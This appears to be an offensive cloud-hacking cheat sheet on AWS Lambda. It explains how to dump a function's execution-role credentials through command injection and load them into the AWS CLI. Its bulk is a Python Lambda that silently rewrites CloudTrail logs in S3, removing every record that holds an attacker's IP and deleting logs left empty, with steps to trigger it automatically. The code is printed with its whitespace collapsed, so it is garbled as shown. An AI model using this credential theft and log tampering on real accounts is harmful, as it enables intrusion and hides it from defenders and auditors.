Lambda functions drop their code into a read-only partition mounted to /var/task. If interactive within a container, inspecting the function code will provide insight to what the function does & has access to:
ls /var/taskcat /var/task/lambda_function.py
We can retrieve the Lambda execution role credentials by pulling the environment. Run “export” via CMD injection or in the context of Lambda running.
Retrieve the aws_access_key_id, aws_secret_access_key, aws_session_token and configure your AWS cli aws configure --profile <PROFILE_NAME>.
You need to manually add the aws_session_token in the new profile under “~/.aws/credentials”.
The aws_session_token doesn’t last long, you need to refresh it after a while.
importjsonimporturllibimportboto3importgzipimporttempfileimportshutildirty_tag=<IP_ADDRESS>deffilter_dirty_tag(log):returndirty_taginjson.dumps(log)s3=boto3.client('s3')deflambda_handler(event,context):bucket=event['Records'][0]['s3']['bucket']['name']key=urllib.unquote_plus(event['Records'][0]['s3']['object']['key']).decode('utf8')resp=s3.get_object(Bucket=bucket,Key=key)gzip_tmp=tempfile.NamedTemporaryFile(delete=False)shutil.copyfileobj(resp['Body'],gzip_tmp)gzip_tmp.close()gzip_filename=gzip_tmp.namewithgzip.open(gzip_filename,'rb')asf:file_content=f.read()logs=json.loads(file_content)old_num_logs=len(logs['Records'])printold_num_logslogs['Records']=filter(lambdax:notfilter_dirty_tag(x),logs['Records'])printlen(logs['Records'])iflen(logs['Records'])==0:print"Deleting empty %s"%keys3.delete_object(Bucket=bucket,Key=key)eliflen(logs['Records'])==old_num_logs:print"Doing nothing no log records filtered"else:print"Updating %s"%keywithgzip.open(gzip_filename,'wb')asf:f.write(json.dumps(logs,separators=(',',':')))s3.put_object(Bucket=bucket,Key=key,Body=open(gzip_filename,'rb'))
Add the trigger for this function by clicking “S3” on the left hand-side of the interface in the web console. Select the S3 bucket with the logs and the click the “Add” button.